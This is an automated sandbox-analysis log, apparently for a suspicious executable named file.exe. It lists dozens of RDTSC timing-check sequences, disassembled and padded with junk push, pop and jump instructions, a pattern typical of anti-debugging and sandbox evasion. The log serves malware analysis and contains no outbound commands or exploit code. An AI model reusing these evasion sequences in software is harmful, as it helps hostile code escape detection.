Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8C81 second address: 12E8C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8C85 second address: 12E8C90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8DD1 second address: 12E8DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8DD9 second address: 12E8DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8DDD second address: 12E8DE9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jns 00007F1F81013DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1297538 second address: 1297542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E9071 second address: 12E908F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jc 00007F1F81013DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1F81013DACh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E908F second address: 12E9093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E9093 second address: 12E909D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EAC28 second address: 12EAC2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EAC2E second address: 12EAC34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EAC34 second address: 12EAC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F80D7764Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12ED92F second address: 12ED949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DB6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F0B1C second address: 12F0B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F0B20 second address: 12F0B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB9h 0x00000007 jmp 00007F1F81013DB9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F0B5C second address: 12F0B66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F6636 second address: 12F663D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F663D second address: 12F6647 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1F80D7764Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F4FDF second address: 12F4FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F4FF7 second address: 12F5014 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1F80D7764Dh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5014 second address: 12F5018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F517E second address: 12F5182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5182 second address: 12F5186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5461 second address: 12F5465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F58E1 second address: 12F58E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F58E7 second address: 12F58FF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F1F80D77646h 0x00000012 jc 00007F1F80D77646h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5D37 second address: 12F5D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1F81013DB0h 0x0000000c push edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F1F81013DADh 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5D5F second address: 12F5D64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5D64 second address: 12F5D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5D6A second address: 12F5D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5ED8 second address: 12F5EE4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F81013DA6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5EE4 second address: 12F5F08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F1F80D77646h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 jnc 00007F1F80D77646h 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jnp 00007F1F80D77646h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5F08 second address: 12F5F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F4D13 second address: 12F4D33 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F1F80D77656h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F4D33 second address: 12F4D4B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F81013DA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F1F81013DCAh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F4D4B second address: 12F4D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB184 second address: 12FB18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB18F second address: 12FB1AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77659h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB1AE second address: 12FB1C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F1F81013DAEh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB1C1 second address: 12FB1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1F80D7764Eh 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB5A6 second address: 12FB5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F1F81013DAAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB5B5 second address: 12FB5CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1F80D7764Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB5CA second address: 12FB5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F1F81013DB3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB731 second address: 12FB73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F80D7764Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB73F second address: 12FB78B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB9h 0x00000007 ja 00007F1F81013DC4h 0x0000000d jmp 00007F1F81013DB8h 0x00000012 jno 00007F1F81013DA6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jo 00007F1F81013DA6h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB78B second address: 12FB7B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F1F80D7764Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1F80D77658h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1300ECA second address: 1300ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13011EC second address: 1301200 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1F80D7764Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1301200 second address: 1301204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130136C second address: 1301370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1301370 second address: 1301374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1301374 second address: 130137C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130137C second address: 1301382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1301382 second address: 130139B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F1F80D7764Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305B3C second address: 1305B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jne 00007F1F81013DA8h 0x0000000f pushad 0x00000010 jns 00007F1F81013DA6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jo 00007F1F81013DA6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13095C4 second address: 13095E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007F1F80D77651h 0x0000000c jnp 00007F1F80D7764Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1308D67 second address: 1308D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1308EDD second address: 1308EE7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F80D7764Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130E717 second address: 130E72F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130E72F second address: 130E733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130E733 second address: 130E737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EBB2 second address: 130EBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EBB6 second address: 130EBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EBBC second address: 130EBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EBC2 second address: 130EBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F81013DAFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EBD7 second address: 130EBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EBDB second address: 130EBF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA6CA second address: 12BA768 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, 55719B81h 0x00000010 mov ebx, dword ptr [ebp+1248875Dh] 0x00000016 push ebx 0x00000017 mov edi, dword ptr [ebp+122D3778h] 0x0000001d pop edx 0x0000001e add eax, ebx 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F1F80D77648h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a mov di, dx 0x0000003d cld 0x0000003e push eax 0x0000003f jmp 00007F1F80D77654h 0x00000044 mov dword ptr [esp], eax 0x00000047 xor ecx, dword ptr [ebp+122D282Fh] 0x0000004d add dword ptr [ebp+12449C3Eh], eax 0x00000053 push 00000004h 0x00000055 add dword ptr [ebp+122D243Ah], eax 0x0000005b nop 0x0000005c jmp 00007F1F80D77655h 0x00000061 push eax 0x00000062 jbe 00007F1F80D7765Fh 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F1F80D7764Dh 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130F9EB second address: 130FA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DB1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130FA00 second address: 130FA19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77655h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130FA19 second address: 130FA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130FA1F second address: 130FA25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130FA25 second address: 130FA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1317F8D second address: 1317FA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D77650h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315F70 second address: 1315F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315F74 second address: 1315F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315F78 second address: 1315F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315F7E second address: 1315F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315F84 second address: 1315F89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315F89 second address: 1315FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1F80D7764Fh 0x0000000b jmp 00007F1F80D77652h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F1F80D77646h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316105 second address: 131610B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316261 second address: 1316267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316267 second address: 1316274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F1F81013DA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316274 second address: 131627A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131627A second address: 1316280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316280 second address: 1316292 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F80D7764Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316292 second address: 1316298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13167E4 second address: 13167EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1F80D77646h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13167EF second address: 13167F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13167F5 second address: 1316804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F80D7764Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316804 second address: 131680D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316DA1 second address: 1316DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316DA8 second address: 1316DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13176FB second address: 13176FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13176FF second address: 1317703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13179A0 second address: 13179C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77652h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F1F80D77646h 0x00000013 jbe 00007F1F80D77646h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1323551 second address: 1323584 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F1F81013DBDh 0x00000011 jmp 00007F1F81013DB5h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1323584 second address: 132359C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F1F80D77646h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edi 0x0000000e jl 00007F1F80D77646h 0x00000014 pop edi 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1322F46 second address: 1322F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jo 00007F1F81013DA6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1322F56 second address: 1322F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1323115 second address: 132311F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1F81013DB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
